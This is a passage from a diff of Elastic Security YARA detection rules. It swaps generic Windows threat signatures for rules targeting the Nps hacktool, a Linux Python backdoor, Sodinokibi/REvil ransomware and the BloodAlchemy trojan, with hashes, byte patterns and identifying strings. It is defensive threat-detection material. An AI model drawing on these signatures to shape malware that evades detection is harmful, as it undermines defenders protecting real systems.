B5 F3 FF FF 8B C3 E8 BE F3 } + $str_info0 = "Reconnecting..." + $str_info1 = "Loading configuration file %s successfully" + $str_info2 = "successful start-up of local socks5 monitoring, port" + $str_info3 = "successful start-up of local tcp monitoring, port" + $str_info4 = "start local file system, local path %s, strip prefix %s ,remote port %" + $str_info5 = "start local file system, local path %s, strip prefix %s ,remote port %s" condition: all of them } -rule ELASTIC_Windows_Generic_Threat_2507C37C : FILE MEMORY +rule ELASTIC_Multi_Hacktool_Nps_F76F257D : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Multi Hacktool Nps (Multi.Hacktool.Nps)" author = "Elastic Security" - id = "2507c37c-a0ef-47e0-a02a-3e28f4655715" - date = "2023-12-18" - modified = "2024-01-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L62-L80" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "04296258f054a958f0fd013b3c6a3435280b28e9a27541463e6fc9afe30363cc" - logic_hash = "8c5ea1290260993ea5140baa4645f3fd0ebb4d43fce0e9a25f8e8948e683aec1" + id = "f76f257d-0286-4b4d-9f73-2add23cfd07e" + date = "2024-01-24" + modified = "2024-01-29" + reference = "https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Multi_Hacktool_Nps.yar#L27-L50" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "80721b20a8667536a33fca50236f5c8e0c0d07aa7805b980e40818ab92cd9f4a" + logic_hash = "0bbd7f86bfd2967dc390510c2e403d05e1b56551b965ea716b9e5330f75c9bd5" score = 75 - quality = 75 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "b20b76f19d21730b6e32d1468f0e14ee9d6f9f07b9692fb6dec76605d9b967e2" - severity = 50 + fingerprint = "4aaa270129ce0c8fdd40aae2ebc4f6595aec91cbfea9e0188542e9c3f38eedee" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "multi" strings: - $a1 = { 55 8B EC 8B 45 14 56 57 33 FF 3B C7 74 47 39 7D 08 75 1B E8 B2 2B 00 00 6A 16 5E 89 30 57 57 57 57 57 E8 3B 2B 00 00 83 C4 14 8B C6 EB 29 39 7D 10 74 E0 39 45 0C 73 0E E8 8D 2B 00 00 6A 22 59 } + $string_decrypt_add = { 0F B6 BC 34 ?? ?? ?? ?? 44 0F B6 84 34 ?? ?? ?? ?? 44 01 C7 40 88 BC 34 ?? ?? ?? ?? 48 FF C6 } + $string_decrypt_xor = { 0F B6 54 ?? ?? 0F B6 74 ?? ?? 31 D6 40 88 74 ?? ?? 48 FF C0 } + $string_decrypt_sub = { 0F B6 94 04 ?? ?? ?? ?? 0F B6 B4 04 ?? ?? ?? ?? 29 D6 40 88 B4 04 ?? ?? ?? ?? 48 FF C0 } + $NewJsonDb_str0 = { 63 6C 69 65 6E 74 73 2E 6A 73 6F 6E } + $NewJsonDb_str1 = { 68 6F 73 74 73 2E 6A 73 6F 6E } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_E052D248 : FILE MEMORY +rule ELASTIC_Linux_Backdoor_Python_00606Bac : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Backdoor Python (Linux.Backdoor.Python)" author = "Elastic Security" - id = "e052d248-32f2-4d51-b42d-468a09e06daa" - date = "2023-12-18" - modified = "2024-01-12" + id = "00606bac-83eb-4a58-82d2-e4fd16d30846" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L82-L100" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ed2bbc0d120665044aacb089d8c99d7c946b54d1b08a078aebbb3b91f593da6e" - logic_hash = "1a16ce6d1c6707560425156e625ad19a82315564b3f03adafbcc3e65b0e98a6d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Backdoor_Python.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b3e3728d43535f47a1c15b915c2d29835d9769a9dc69eb1b16e40d5ba1b98460" + logic_hash = "92ad2cf4aa848c8f3bcedd319654bf5ef873cd4daba62572381c7e20f0296b82" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ccfbcb9271b1ce99b814cf9e3a4776e9501035166824beaf39d4b8cd03446ef3" - severity = 50 + fingerprint = "cce1d0e7395a74c04f15ff95f6de7fd7d5f46ede83322b832df74133912c0b17" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 64 A1 00 00 00 00 6A FF 68 4F 5A 54 00 50 64 89 25 00 00 00 00 6A 02 68 24 D0 58 00 E8 FF 65 10 00 C7 45 FC FF FF FF FF 68 10 52 55 00 E8 F7 72 10 00 8B 4D F4 83 C4 0C 64 89 0D 00 00 } + $a = { F4 01 83 45 F8 01 8B 45 F8 0F B6 00 84 C0 75 F2 83 45 F8 01 8B } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_2Bb7Fbe3 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Sodinokibi_83F05Fbe : BETA FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Identifies SODINOKIBI/REvil ransomware" author = "Elastic Security" - id = "2bb7fbe3-2add-4ae9-adbf-5f043475d879" - date = "2023-12-18" - modified = "2024-01-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L102-L120" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "65cc8704c0e431589d196eadb0ac8a19151631c8d4ab7375d7cb18f7b763ba7b" - logic_hash = "36e1ab766e09e8d06b9179f67a1cb842ba257f140610964a941fb462ed3e803c" + id = "83f05fbe-65d1-423f-98df-21692167a1d6" + date = "2020-06-18" + modified = "2021-08-23" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.revil" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Sodinokibi.yar#L1-L34" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "c88fc2690deae3700e605b2affb5ecac3d1ffc92435f33209f31897d28715b8c" score = 75 - quality = 75 - tags = "FILE, MEMORY" - fingerprint = "e20c20c61768bd936cc18df56d7ec12d92745b6534ac8149bf367d6ad62fa8bd" - severity = 50 + quality = 73 + tags = "BETA, FILE, MEMORY" + fingerprint = "8c32ca099c9117e394379c0cc4771a15e5e4cfb1a98210c288e743a6d9cc9967" + threat_name = "Windows.Ransomware.Sodinokibi" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 83 EC 14 68 B6 32 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 30 53 56 57 89 65 EC C7 45 F0 C0 15 40 00 33 F6 89 75 F4 89 75 F8 89 75 E0 89 75 DC 89 75 D8 6A 01 FF 15 AC 10 } + $d1 = { 03 C0 01 47 30 11 4F 34 01 57 30 8B 57 78 8B C2 11 77 34 8B 77 7C 8B CE 0F A4 C1 04 C1 E0 04 01 47 28 8B C2 11 4F 2C 8B CE 0F A4 C1 01 03 C0 01 47 28 11 4F 2C 01 57 28 8B 57 70 8B C2 11 77 2C 8B 77 74 8B CE 0F A4 C1 04 C1 E0 04 01 47 20 8B C2 11 4F 24 8B CE 0F A4 C1 01 03 C0 01 47 20 11 4F 24 01 57 20 8B 57 68 8B C2 11 77 24 8B 77 6C 8B CE 0F A4 C1 04 C1 E0 04 01 47 18 8B C2 11 4F 1C 8B CE 0F A4 C1 01 03 C0 01 47 18 11 4F 1C 01 57 18 8B 57 60 8B C2 11 77 1C 8B 77 64 } + $d2 = { 65 78 70 61 6E 64 20 33 32 2D 62 79 74 65 20 6B 65 78 70 61 6E 64 20 31 36 2D 62 79 74 65 20 6B } + $d3 = { F7 6F 38 03 C8 8B 43 48 13 F2 F7 6F 20 03 C8 8B 43 38 13 F2 F7 6F 30 03 C8 8B 43 40 13 F2 F7 6F 28 03 C8 8B 43 28 13 F2 F7 6F 40 03 C8 8B 45 08 13 F2 89 48 68 89 70 6C 8B 43 38 F7 6F 38 8B C8 8B F2 8B 43 28 F7 6F 48 03 C8 13 F2 8B 43 48 F7 6F 28 03 C8 8B 43 30 13 F2 F7 6F 40 0F A4 CE 01 03 C9 03 C8 8B 43 40 13 F2 F7 6F 30 03 C8 8B 45 08 13 F2 89 48 70 89 70 74 8B 43 38 F7 6F 40 8B C8 } + $d4 = { 33 C0 8B 5A 68 8B 52 6C 0F A4 FE 08 C1 E9 18 0B C6 C1 E7 08 8B 75 08 0B CF 89 4E 68 8B CA 89 46 6C 33 C0 8B 7E 60 8B 76 64 0F A4 DA 19 C1 E9 07 0B C2 C1 E3 19 8B 55 08 0B CB 89 4A 60 8B CF 89 42 64 33 C0 8B 5A 10 8B 52 14 0F AC F7 15 C1 E1 0B C1 EE 15 0B C7 0B CE 8B 75 } + $d5 = { C1 01 C1 EE 1F 0B D1 03 C0 0B F0 8B C2 33 43 24 8B CE 33 4B 20 33 4D E4 33 45 E0 89 4B 20 8B CB 8B 5D E0 89 41 24 8B CE 33 4D E4 8B C2 31 4F 48 33 C3 8B CF 31 41 4C 8B C7 8B CE 33 48 70 8B C2 33 47 74 33 4D E4 33 C3 89 4F 70 8B CF 89 41 74 8B } + $d6 = { 8B 43 40 F7 6F 08 03 C8 8B 03 13 F2 F7 6F 48 03 C8 8B 43 48 13 F2 F7 2F 03 C8 8B 43 08 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 18 03 C8 8B 43 18 13 F2 F7 6F 30 03 C8 8B 43 38 13 F2 F7 6F 10 03 C8 8B 43 10 13 F2 F7 6F 38 03 C8 8B 43 28 13 F2 } + $d7 = { 8B CE 33 4D F8 8B C2 33 C3 31 4F 18 8B CF 31 41 1C 8B C7 8B CE 33 48 40 8B C2 33 4D F8 33 47 44 89 4F 40 33 C3 8B CF 89 41 44 8B C7 8B CE 33 48 68 8B C2 33 47 6C 33 4D F8 33 C3 89 4F 68 8B CF 89 41 6C 8B CE 8B } + $d8 = { 36 7D 49 30 85 35 C2 C3 68 60 4B 4B 7A BE 83 53 AB E6 8E 42 F9 C6 62 A5 D0 6A AD C6 F1 7D F6 1D 79 CD 20 FC E7 3E E1 B8 1A 43 38 12 C1 56 28 1A 04 C9 22 55 E0 D7 08 BB 9F 0B 1F 1C B9 13 06 35 } + $d9 = { C2 C1 EE 03 8B 55 08 0B CE 89 4A 4C 8B CF 89 42 48 33 C0 8B 72 30 8B 52 34 C1 E9 0C 0F A4 DF 14 0B C7 C1 E3 14 8B 7D 08 0B CB 89 4F 30 8B CE 89 47 34 33 C0 C1 E1 0C 0F AC D6 14 0B C6 C1 EA 14 89 47 08 0B CA } + $d10 = { 8B F2 8B 43 38 F7 6F 28 03 C8 8B 43 18 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 38 03 C8 8B 43 40 13 F2 F7 6F 20 0F A4 CE 01 03 C9 03 C8 8B 43 20 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 30 03 C8 } + $d11 = { 33 45 FC 31 4B 28 8B CB 31 41 2C 8B CE 8B C3 33 48 50 8B C2 33 43 54 33 CF 33 45 FC 89 4B 50 8B CB 89 41 54 8B CE 8B C3 33 48 78 8B C2 33 43 7C 33 CF 33 45 FC 89 4B 78 8B CB 89 41 7C 33 B1 A0 } + $d12 = { 52 24 0F A4 FE 0E C1 E9 12 0B C6 C1 E7 0E 8B 75 08 0B CF 89 4E 20 8B CA 89 46 24 33 C0 8B 7E 78 8B 76 7C 0F A4 DA 1B C1 E9 05 0B C2 C1 E3 1B 8B 55 08 0B CB 89 4A 78 8B CF 89 42 7C 33 C0 8B 9A } + $d13 = { F2 8B 43 38 F7 6F 20 03 C8 8B 43 40 13 F2 F7 6F 18 03 C8 8B 43 10 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 30 03 C8 8B 43 20 13 F2 F7 6F 38 03 C8 8B 43 30 13 F2 F7 6F 28 03 C8 8B 43 48 13 F2 } + $d14 = { 8B 47 30 13 F2 F7 6F 40 03 C8 13 F2 0F A4 CE 01 89 73 74 03 C9 89 4B 70 8B 47 30 F7 6F 48 8B C8 8B F2 8B 47 38 F7 6F 40 03 C8 13 F2 0F A4 CE 01 89 73 7C 03 C9 89 4B 78 8B 47 38 F7 6F 48 8B C8 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_994F2330 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Sodinokibi_182B2Cea : BETA FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Identifies SODINOKIBI/REvil ransomware" author = "Elastic Security" - id = "994f2330-ce61-4c23-b100-7df3feaeb078" - date = "2023-12-18" - modified = "2024-01-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L122-L140" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0a30cb09c480a2659b6f989ac9fe1bfba1802ae3aad98fa5db7cdd146fee3916" - logic_hash = "ace99deae7f5faa22f273ec4fe45ef07f03acd1ae4d9c0f18687ef6cf5b560c2" + id = "182b2cea-5aae-443a-9a2e-b3121a0ac8c7" + date = "2020-06-18" + modified = "2021-10-04" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.revil" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Sodinokibi.yar#L36-L62" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "1c23effe5f8b35c5e03ebd5e57664c8937259d464f92dda0a9df344b982e8f8c" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "4749717da2870a3942d7a3aa7e2809c4b9dc783a484bfcd2ce7416ae67164a26" - severity = 50 + tags = "BETA, FILE, MEMORY" + fingerprint = "b71d862f6d45b388a106bf694e2bf5b4e4d78649c396e89bda46eab4206339fe" + threat_name = "Windows.Ransomware.Sodinokibi" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 83 EC 0C 8B 55 08 85 D2 0F 84 C7 00 00 00 8B 42 3C 83 7C 10 74 10 8D 44 10 18 0F 82 B5 00 00 00 83 78 64 00 0F 84 AB 00 00 00 8B 4D 0C 8B 40 60 C1 E9 10 03 C2 66 85 C9 75 14 0F B7 4D } + $a1 = "expand 32-byte kexpand 16-byte k" ascii fullword + $b1 = "ServicesActive" wide fullword + $b2 = "CreateThread" ascii fullword + $b3 = "GetExitCodeProcess" ascii fullword + $b4 = "CloseHandle" ascii fullword + $b5 = "SetErrorMode" ascii fullword + $b6 = ":!:(:/:6:C:\\:m:" ascii fullword condition: - all of them + ($a1 and 6 of ($b*)) } -rule ELASTIC_Windows_Generic_Threat_Bf7Aae24 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Sodinokibi_A282Ba44 : BETA FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Identifies SODINOKIBI/REvil ransomware" author = "Elastic Security" - id = "bf7aae24-f89a-4cc6-9a15-fc29aa80af98" - date = "2023-12-18" - modified = "2024-01-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L142-L160" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6dfc63894f15fc137e27516f2d2a56514c51f25b41b00583123142cf50645e4e" - logic_hash = "b6dfa6f4c46bddd643f2f89f6275404c19fd4ed1bbae561029fffa884e99e167" + id = "a282ba44-b8bf-4fcc-a1c4-795675a928de" + date = "2020-06-18" + modified = "2021-08-23" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.revil" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Sodinokibi.yar#L64-L91" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "3a583069c9ab851a90f3a61c9c4fa67f8b918b8d168fcf7f25b2a3ae3465c596" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "9304e9069424d43613ef9a5484214d0e3620245ef9ae64bae7d825f5f69d90c0" - severity = 50 + tags = "BETA, FILE, MEMORY" + fingerprint = "07f1feb22f8b9de0ebd5c4649545eb4823a274b49b2c61a44d3eed4739ecd572" + threat_name = "Windows.Ransomware.Sodinokibi" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 48 33 F6 44 8B EE 48 89 74 24 20 8B EE 48 89 B4 24 A8 00 00 00 44 8B F6 48 89 74 24 28 44 8B E6 E8 BF FF FF FF 4C 8B F8 8D 5E 01 B8 4D 5A 00 00 66 41 39 07 75 1B 49 63 57 3C 48 8D 4A } + $c1 = { 59 59 85 F6 74 25 8B 55 08 83 66 04 00 89 3E 8B 0A 0B 4A 04 } + $c2 = { 8D 45 F8 89 75 FC 50 8D 45 FC 89 75 F8 50 56 56 6A 01 6A 30 } + $c3 = { 75 0C 72 D3 33 C0 40 5F 5E 5B 8B E5 5D C3 33 C0 EB F5 55 8B EC 83 } + $c4 = { 0C 8B 04 B0 83 78 04 05 75 1C FF 70 08 FF 70 0C FF 75 0C FF } + $c5 = { FB 8B 45 FC 50 8B 08 FF 51 08 5E 8B C7 5F 5B 8B E5 5D C3 55 } + $c6 = { BC 00 00 00 33 D2 8B 4D F4 8B F1 8B 45 F0 0F A4 C1 01 C1 EE 1F } + $c7 = { 54 8B CE F7 D1 8B C2 23 4D DC F7 D0 33 4D F4 23 C7 33 45 E8 89 } + $c8 = { 0C 89 46 0C 85 C0 75 2A 33 C0 EB 6C 8B 46 08 85 C0 74 62 6B } condition: - all of them + (6 of ($c*)) } -rule ELASTIC_Windows_Generic_Threat_D542E5A5 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Bloodalchemy_3793364E : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Bloodalchemy (Windows.Trojan.BloodAlchemy)" author = "Elastic Security" - id = "d542e5a5-0648-40de-8b70-9f78f9bd1443" - date = "2023-12-18" - modified = "2024-01-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L162-L180" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3fc4ae7115e0bfa3fc6b75dcff867e7bf9ade9c7f558f31916359d37d001901b" - logic_hash = "3c16c02d4fc6e019f0ab0ff4daad61f59275afd8fb3ee263b1b59876233a686e" + id = "3793364e-a73c-4cf0-855c-fdcdb2b88386" + date = "2023-09-25" + modified = "2023-09-25" + reference = "https://www.elastic.co/security-labs/disclosing-the-bloodalchemy-backdoor" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_BloodAlchemy.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "c9f03767b92bb2c44f6b386e1f0a521f1a7a063cf73799844cc3423d4a7de7be" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "62d3edc282cedd5a6464b92725a3916e3bdc75e8eb39db457d783cb27afa3aec" - severity = 50 + fingerprint = "b4620f360093284ae6f2296b4239227099f58f8f0cfe9f70298c84d6cbe7fa29" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 55 8B EC 56 FF 75 08 8B F1 E8 B6 FF FF FF C7 06 AC 67 41 00 8B C6 5E 5D C2 04 00 8B FF 55 8B EC 56 FF 75 08 8B F1 E8 99 FF FF FF C7 06 B8 67 41 00 8B C6 5E 5D C2 04 00 B8 EF 5B 40 00 A3 E8 5A } + $a1 = { 55 8B EC 51 83 65 FC 00 53 56 57 BF 00 20 00 00 57 6A 40 FF 15 } + $a2 = { 55 8B EC 81 EC 80 00 00 00 53 56 57 33 FF 8D 45 80 6A 64 57 50 89 7D E4 89 7D EC 89 7D F0 89 7D } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_8D10790B : FILE MEMORY +rule ELASTIC_Windows_Trojan_Bloodalchemy_E510798D : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Bloodalchemy (Windows.Trojan.BloodAlchemy)" author = "Elastic Security" - id = "8d10790b-6f26-46bf-826e-1371565763f0" - date = "2023-12-18" - modified = "2024-01-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L182-L200" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "911535923a5451c10239e20e7130d371e8ee37172e0f14fc8cf224d41f7f4c0f" - logic_hash = "84c017abbce1c8702efbe8657e5a857ae222721b0db2260dc814652f4528df26" + id = "e510798d-a938-47ba-92e3-0c1bcd3ce9a9" + date = "2023-09-25" + modified = "2023-09-25" + reference = "https://www.elastic.co/security-labs/disclosing-the-bloodalchemy-backdoor" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_BloodAlchemy.yar#L22-L41" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "7919bb5f19745a1620e6be91622c40083cbd2ddb02905215736a2ed11e9af5c4" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "7cc33c6684318373e45f5e7440f0a416dd5833a56bc31eb8198a3c36b15dd25e" - severity = 50 + fingerprint = "151519156e4c6b5395c03f70c77601681f17f86a08db96a622b9489a3df682d6" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 55 8B EC 81 EC 04 00 00 00 8B 5D 08 8B 1B 83 C3 04 89 5D FC 8B 45 0C 8B 5D FC 89 03 8B E5 5D C2 08 00 55 8B EC 81 EC 0C 00 00 00 C7 45 FC 00 00 00 00 68 00 00 00 00 BB C4 02 00 00 E8 0D 05 00 } + $a1 = { 55 8B EC 83 EC 54 53 8B 5D 08 56 57 33 FF 89 55 F4 89 4D F0 BE 00 00 00 02 89 7D F8 89 7D FC 85 DB } + $a2 = { 55 8B EC 83 EC 0C 56 57 33 C0 8D 7D F4 AB 8D 4D F4 AB AB E8 42 10 00 00 8B 7D F4 33 F6 85 FF 74 03 8B 77 08 } condition: - all of them + any of them } -rule ELASTIC_Windows_Generic_Threat_347F9F54 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Bloodalchemy_63084Eea : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Bloodalchemy (Windows.Trojan.BloodAlchemy)" author = "Elastic Security" - id = "347f9f54-b9a6-4d40-9627-d3cef78f13eb" - date = "2023-12-18" - modified = "2024-01-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L202-L220" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "45a051651ce1edddd33ecef09bb0fbb978adec9044e64f786b13ed81cabf6a3f" - logic_hash = "63df388393a45ffec68ba01ae6d7707b6d5277e0162ded6e631c1f76ad76b711" + id = "63084eea-358b-4fb0-9668-3f40f0aae9e7" + date = "2023-09-25" + modified = "2023-09-25" + reference = "https://www.elastic.co/security-labs/disclosing-the-bloodalchemy-backdoor" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_BloodAlchemy.yar#L43-L61" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "3fe64502992281511e942b8f4541d61b33e900dbe23ea9f976c7eb9522ce4cbd" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "860f951db43fa3389c5057f7329b5d13d9347b6e04e1363dd0a8060d5a131991" - severity = 50 + fingerprint = "3f6ef0425b846b2126263c590d984bc618ad61de91a9141160c2b804c585ff6d" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 83 EC 10 FF 75 0C 80 65 FC 00 8D 45 F0 C6 45 F0 43 50 C6 45 F1 6F FF 75 08 C6 45 F2 6E C6 45 F3 6E C6 45 F4 65 C6 45 F5 63 C6 45 F6 74 C6 45 F7 47 C6 45 F8 72 C6 45 F9 6F C6 45 FA 75 } + $a = { 55 8B EC 83 EC 38 53 56 57 8B 75 08 8D 7D F0 33 C0 33 DB AB 89 5D C8 89 5D D0 89 5D D4 AB 89 5D } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_20469956 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Bloodalchemy_C2D80609 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Bloodalchemy (Windows.Trojan.BloodAlchemy)" author = "Elastic Security" - id = "20469956-1be6-48e8-b3c4-5706f9630971" - date = "2023-12-18" - modified = "2024-01-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L222-L240" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a1f2923f68f5963499a64bfd0affe0a729f5e7bd6bcccfb9bed1d62831a93c47" - logic_hash = "da351bec0039a32bb9de1d8623ab3dc26eb752d30a64e613de96f70e1b1c2463" + id = "c2d80609-9a66-4fbb-b594-17d16372cb14" + date = "2023-09-25" + modified = "2023-09-25" + reference = "https://www.elastic.co/security-labs/disclosing-the-bloodalchemy-backdoor" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_BloodAlchemy.yar#L63-L81" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "694a0f917f106fbdde4c8e5dd8f9cdce56e9423ce5a7c3a5bf30bf43308d42e9" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "67cec754102e3675b4e72ff4826c40614e4856b9cbf12489de3406318990fc85" - severity = 50 + fingerprint = "8815e42ef85ae5a8915cd26b573cd7411c041778cdf4bc99efd45526e3699642" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 83 E4 F8 83 EC 5C 53 56 33 C0 C7 44 24 18 6B 00 6C 00 57 8D 4C 24 1C C7 44 24 20 69 00 66 00 C7 44 24 24 2E 00 73 00 C7 44 24 28 79 00 73 00 66 89 44 24 2C C7 44 24 0C 6B 00 6C 00 C7 } + $a = { 55 8B EC 83 EC 30 53 56 57 33 C0 8D 7D F0 AB 33 DB 68 02 80 00 00 6A 40 89 5D FC AB AB FF 15 28 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_742E8A70 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Bloodalchemy_De591C5A : FILE MEMORY { meta: - description = "Detects Windows Generic Threat 